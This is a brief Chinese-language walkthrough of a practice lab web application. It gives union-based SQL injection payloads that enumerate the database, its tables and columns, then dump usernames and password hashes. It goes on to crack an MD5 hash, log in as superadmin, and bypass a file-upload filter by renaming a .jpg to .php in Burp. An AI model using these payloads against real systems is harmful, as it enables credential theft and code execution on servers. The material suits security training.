打开靶场创建用户,随意
登录
单击search可以进行查看到很多的书名
验证sql注入
Windows OS' and 1=1#
判断字段数
Windows OS' order by 3#
Windows OS' order by 4#
判断显示位置
-1' union select 1,2,3#
查看当前数据库位置
-1' union select database(),2,3#
查看webapphacking库所有的表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
查看users表中所有的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
查看表中user,password字段数据
-1' union select group_concat(user),group_concat(pasword),3 from users#
将得到密码进行MD5解密
使用superadmin用户登录 密码:Uncrackable 发现文件上传点
上传一个1.jpg,内容为phpinfo()上传前先开启burp抓包,拦截-修改后缀,我们可以从回包中看出文件已将上传至文件夹
查看你目录扫描出的路径http://172.16.1.9/uploads/1.php